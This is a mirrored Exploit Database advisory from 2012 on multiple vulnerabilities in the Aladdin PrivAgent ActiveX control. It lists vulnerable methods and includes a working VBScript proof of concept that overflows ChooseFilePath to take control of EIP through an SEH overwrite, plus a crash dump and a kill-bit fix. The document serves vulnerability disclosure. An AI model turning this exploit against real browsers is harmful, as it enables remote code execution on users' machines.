Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 – Multiple Vulnerabilities

• Exploit Database
• 13 阅读

• 作者： shinnai
  日期： 2012-10-26
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/22258/

• -----BEGIN PGP SIGNED MESSAGE-----
  Hash: SHA1
  
  =============================================================================================
   FILE INFO:
  =============================================================================================
   Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 Multiple Remote Vulnerabilities
  
   File: PrivAgent.ocx
   InternalName: PrivAgentAx
   OriginalFilename: PrivAgent.ocx
   FileVersion:2.0.0.0
   FileDescription:PrivAgent ActiveX Control
   Product:Privilege
   ProductVersion: 02.0
   Debug:False
   Patched:False
   PreRelease: False
   PrivateBuild: True
   SpecialBuild: False
   Language: English (United States)
   MD5 hash: c96dfc282b6bdc177abd076a9bb94933
  =============================================================================================
   OBJECT SAFETY REPORT:
  =============================================================================================
   CLSID:{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}
   ProgID: PrivAgentAx.PrivAgent.1
   Description:PrivAgent Class
   RegKey Safe for Script: True
   RegKey Safe for Init: True
   Implements IObjectSafety: False
  =============================================================================================
   TESTED ON:
  =============================================================================================
   Windows XP Professional SP3
   Windows 7 Professional SP3
  =============================================================================================
   DOWNLOADABLE FROM:
  =============================================================================================
   ftp://ftp.aladdin.com//pub/privilege/activex2002.zip
  =============================================================================================
   BUG INFO:
  =============================================================================================
   This ocx seems to be really poor coded. I've found so many errors that I felt too choosy
   (yes Mrs. Elsa Fornero, I AM choosy and I AM proud of it) to test any other method.
   Below there's a list of stack-based buffer overflow, insecure file download and a proof
   of concept which exploits a good old fashioned (or trivial, if you like) stack based
   buffer overflow, triggered simply passing to the "ChooseFilePath" method a string longer
   than 268 bytes. In this case, after a memory reading exception, we are in full control of
   EIP.
   Here it is the list of vulnerable methods, guess which ones are vulnerable to arbitrary
   file download? :)
   
   #1
   Function DownloadLicense (
  	ByVal sURLAs String , 
  	ByVal sPathAs String , 
   	ByVal bInstallAs Boolean 
   )As Long
  
   #2
   Function ChooseFilePath (
   	ByVal sFileNameAs String 
   )As String
  
   #3
   Function InstallLicense (
   	ByVal szLicensePathAs String 
   )As Long
  
   #4
   Function InstallPrivilege (
   	ByVal szInstFilePathAs String 
   )As Long
  
   #4
   Function DownloadPrivilege (
   	ByVal szURLAs String , 
   	ByVal szTargetDirAs String , 
   	ByVal bInstallAs Boolean 
   )As Long
  
   #4
   Function InstallDevExt (
   	ByVal szDevExtPathAs String 
   )As Long
  
   #5
   Function DownloadDevExt (
   	ByVal szURLAs String , 
   	ByVal szTargetPathAs String , 
   	ByVal bInstallAs Boolean 
   )As Long
  =============================================================================================
   PROOF OF CONCEPT:
  =============================================================================================
  
  <html>
   <object classid='clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6' id='test'></object>
  <script language = 'vbscript'>
   buffer= String(268, "A")
   getEIP= unescape("bbbb")
   buffer_2= "CCCCCCCC"
   exception = unescape("%5A%0B%02%10") '0x10020B5A pop ESI-pop-ret from PrivAgent.ocx
   buffer_3= unescape("EEEE" + String(2712, "F"))
  
   test.ChooseFilePath buffer + getEIP + buffer_2 + exception + buffer_3
  </script>
  </html>
  
  =============================================================================================
   CRASH DUMP:
  =============================================================================================
   0:005> g
   WARNING: Continuing a non-continuable exception
   (1138.1304): Access violation - code c0000005 (first chance)
   First chance exceptions are reported before any exception handling.
   This exception may be expected and handled.
   eax=00000000 ebx=076886d8 ecx=00385f70 edx=086dc628 esi=0253cfa4 edi=0253cd24
   eip=62626262 esp=0253cce4 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
   cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246
   62626262 ?????
  =============================================================================================
   FIX:
  =============================================================================================
   Set kill-bit to stop the activeX control
  =============================================================================================
  
  -----BEGIN PGP SIGNATURE-----
  Version: GnuPG v1.4.9 (MingW32)
  
  iQIcBAEBAgAGBQJQijFXAAoJEJlK/ai8vywm9ooP/RTuGJMOI+t8SABs9y2BSUR4
  oj59/J4zF/Ofw7Id/LN3MHAbqUVXWpUQBtjyjIPPGyAReVacn1lUScVhP11R1bRD
  bXbOUw+BU2pfvSmyFaVPQlLe+T6umHaFrEqpbIhgsJSARD8qOQPpd7crywzQXau0
  fa/kf/tpK1tJ42A5gnCV7UybRb4mfmwcz46UfZY2mMYDPzBYInqZJ8+cAgaih/1k
  bdbti+Cpy9Pj+33I2q1YSnlMGqVjIKqT+FCfdVN1DL03/U/TjAeddcCz6fHxpu+t
  nuLWRrAV3CLrSQtYpluBBjASHer5/KzLFZBPZ8MOi97wA+C2oiOnMPbkNDQfjBn2
  EzXnKn1hKNI20WBb48j3oqohQYAFksOu9MErWLekF/tvVkhywtM1qQFRrQrqLf5c
  xJl0DnbM4RiCOmOiAVYRAwTGhYnSsLUYrytO38JINS3TcdyeoZJrNHXcCzZrJJkl
  xmZ8Yqmq3xmEkPQ6YcEybJrzL9j1cFo4wJEkuggr9kEpgbg34N6oQn631QirEdN2
  WUo9w02Rk4W5Jh637DojUjOru2aBA1aGxM92Db1X445dt+VdYhOUUdQVQC+X9xJm
  o0g8NWQSJtGQgTY/u/ZH8fpAcsGcij23Ktq+gc1ma0Sc5U89b64ny2YFsjWxmhcm
  NH/Cs44PsO755FWU917q
  =WA+e
  -----END PGP SIGNATURE-----